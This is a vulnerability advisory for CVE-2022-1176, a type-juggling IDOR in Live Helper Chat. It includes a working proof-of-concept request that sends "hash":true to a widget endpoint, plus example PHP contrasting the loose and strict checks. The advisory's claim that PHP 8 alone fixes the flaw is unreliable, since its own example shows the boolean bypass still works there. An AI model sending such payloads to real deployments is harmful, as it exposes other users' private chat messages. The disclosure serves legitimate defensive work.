CVE-2022-1176: Loose comparison causes IDOR on multiple endpoints in livehelperchat

Loose comparison causes IDOR on multiple endpoints in GitHub repository livehelperchat/livehelperchat prior to 3.96.


Description

Live Helper Chat is vulnerable to type juggling on requestPayload['hash']. The application uses a loose comparison (==) to check whether the user-controlled parameter equals the chat's stored hash. Because the request body is parsed as JSON, the parameter can be supplied as a non-string type (for example a boolean), and PHP's loose comparison then evaluates the condition as true without the hash being known. This occurs on multiple endpoints.

Proof of Concept

For the PoC, the vulnerability resides on https://github.com/LiveHelperChat/livehelperchat/blob/master/lhc_web/modules/lhwidgetrestapi/fetchmessage.php#L19

    if ($chat instanceof erLhcoreClassModelChat && $chat->hash == $requestPayload['hash'])

1. Request

    POST /eng/widgetrestapi/fetchmessages HTTP/1.1
    Host: demo.livehelperchat.com
    Cookie: lhc_vid=eb9bc0c044919538c5b1
    Content-Length: 62
    Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="99"
    Accept: application/json, text/plain, */*
    Content-Type: application/x-www-form-urlencoded
    Sec-Ch-Ua-Mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
    Sec-Ch-Ua-Platform: "macOS"
    Origin: https://demo.livehelperchat.com
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://demo.livehelperchat.com/
    Accept-Encoding: gzip, deflate
    Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
    Connection: close

    {"chat_id":2,"hash":true,"lmgsid":1,"theme":1,"new_chat":true}

Note the "hash":true. When PHP compares a string loosely against a boolean, the string is cast to bool, and any non-empty hash is truthy, so the if condition is always satisfied.

The loose comparison can be fixed by using a type-safe check (===) or by upgrading to PHP 8 or later.
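The following is an added example, not code from the Live Helper Chat project, that reproduces the quoted check against JSON bodies carrying a hash of different types and places it beside a strict replacement. The stored hash value and the function names are constructed for the illustration. It also shows a practitioner's caveat: the boolean payload still passes PHP 8's loose comparison, because comparison with a bool casts the other operand to bool regardless of version (PHP 8 only tightened string-to-number comparisons), so the strict check is the reliable fix.

```php
<?php
// Added example (not Live Helper Chat code). $storedHash stands in for
// $chat->hash; the value is a constructed sample, not a real chat hash.
$storedHash = 'e7c3a9b1d2f4';

// Vulnerable form: the loose comparison quoted in the advisory.
function looseHashCheck(string $storedHash, $userHash): bool
{
    return $storedHash == $userHash;
}

// Hardened form: require a string and compare it in constant time.
// hash_equals() is a strict, length-safe comparison from PHP core.
function strictHashCheck(string $storedHash, $userHash): bool
{
    return is_string($userHash) && hash_equals($storedHash, $userHash);
}

// Constructed request bodies, mirroring the shape used by the widget API.
$bodies = [
    'correct hash' => '{"chat_id":2,"hash":"e7c3a9b1d2f4"}',
    'wrong hash'   => '{"chat_id":2,"hash":"000000000000"}',
    'boolean true' => '{"chat_id":2,"hash":true}',
    'integer 0'    => '{"chat_id":2,"hash":0}',
];

foreach ($bodies as $label => $json) {
    $payload = json_decode($json, true);
    printf(
        "%-13s loose=%-5s strict=%s\n",
        $label,
        var_export(looseHashCheck($storedHash, $payload['hash']), true),
        var_export(strictHashCheck($storedHash, $payload['hash']), true)
    );
}
// Expected: only "correct hash" passes the strict check. The loose check
// also passes "boolean true" on every PHP version (bool casting), and
// passes "integer 0" on PHP 7 (non-numeric string casts to 0) but not
// on PHP 8, where the int is instead cast to the string "0".
```

Run with `php example.php`. The key defensive point is the `is_string()` guard before `hash_equals()`: without it a non-string payload would raise a TypeError rather than silently matching, which is safer than the loose form but still leaks the fact that type validation is missing from the endpoint.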

I've attached more occurrences of the same vulnerability:

- modules/lhwidgetrestapi/fetchmessage.php
- modules/lhwidgetrestapi/fetchmessages.php
- modules/lhwidgetrestapi/getmessagesnippet.php
- modules/lhwidgetrestapi/initchat.php
- modules/lhwidgetrestapi/uisettings.php

Impact

It's possible to bypass the hash checks on the affected endpoints. An attacker could access private information, such as chat messages, belonging to other users.
